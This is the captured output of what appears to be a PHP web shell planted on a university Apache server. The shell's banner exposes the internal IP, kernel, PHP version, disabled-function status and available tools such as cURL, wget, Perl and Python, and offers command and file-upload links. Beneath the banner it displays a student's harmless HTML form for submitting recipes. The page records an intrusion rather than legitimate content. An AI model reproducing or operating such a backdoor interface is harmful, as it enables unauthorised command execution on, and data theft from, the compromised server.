Server IP : 172.16.15.8 / Your IP : 3.147.62.99 Web Server : Apache System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64 User : apache ( 48) PHP Version : 7.2.24 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/vgmiller/hello/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!-- SubmitRecipeForm.html --> <!-- Purpose is to be a form for submitting recipes to the master recipe list --> <style> body{ background-color:#CEF6D8 } </style> <CENTER> <H2> Submit a recipe! </H2> <HR> <P> <table border=1><tr><td>Fields marked with a star (*) are required fields</td></tr></table> <P> <FORM action=SubmitRecipeAction.php method=post> Enter your name to credit yourself for the recipe! <input type=text name=name size=40> <BR>(Leave blank to submit recipe anonymously) <P> *Recipe Name: <input type=text name=recname size=35> <P> *Cook time (in minutes): <input type=text name=cooktime size=3> <P> Special dietary standards met? <P> <INPUT type=checkbox name=vegetarian value="X">Vegetarian<BR> <INPUT type=checkbox name=glutenfree value="X">Gluten-free<BR> <P> Please put in the amount of the ingredient needed (i.e. 1 tsp OR 2.5 cups) then the name of the ingredient. <BR> All recipes must have a minimum of 2 ingredients. <P> *Ingredient 1 measurement: <input type=text name=ing1_amt size=10> <BR> *Ingredient 1: <input type=text name=ing1 size=35> <P> *Ingredient 2 measurement: <input type=text name=ing2_amt size=10> <BR> *Ingredient 2: <input type=text name=ing2 size=35> <P> Ingredient 3 measurement: <input type=text name=ing3_amt size=10> <BR> Ingredient 3: <input type=text name=ing3 size=35> <P> Ingredient 4 measurement: <input type=text name=ing4_amt size=10> <BR> Ingredient 4: <input type=text name=ing4 size=35> <P> Ingredient 5 measurement: <input type=text name=ing5_amt size=10> <BR> Ingredient 5: <input type=text name=ing5 size=35> <P> Ingredient 6 measurement: <input type=text name=ing6_amt size=10> <BR> Ingredient 6: <input type=text name=ing6 size=35> <P> Ingredient 7 measurement: <input type=text name=ing7_amt size=10> <BR> Ingredient 7: <input type=text name=ing7 size=35> <P> Ingredient 8 measurement: <input type=text name=ing8_amt size=10> <BR> Ingredient 8: <input type=text name=ing8 size=35> <P> Ingredient 9 measurement: <input type=text name=ing9_amt size=10> <BR> Ingredient 9: <input type=text name=ing9 size=35> <P> Ingredient 10 measurement: <input type=text name=ing10_amt size=10> <BR> Ingredient 10: <input type=text name=ing10 size=35> <P> Please review your recipe before submitting! <P> <input type=submit value=Submit> <input type=reset value=Reset> </form> </CENTER>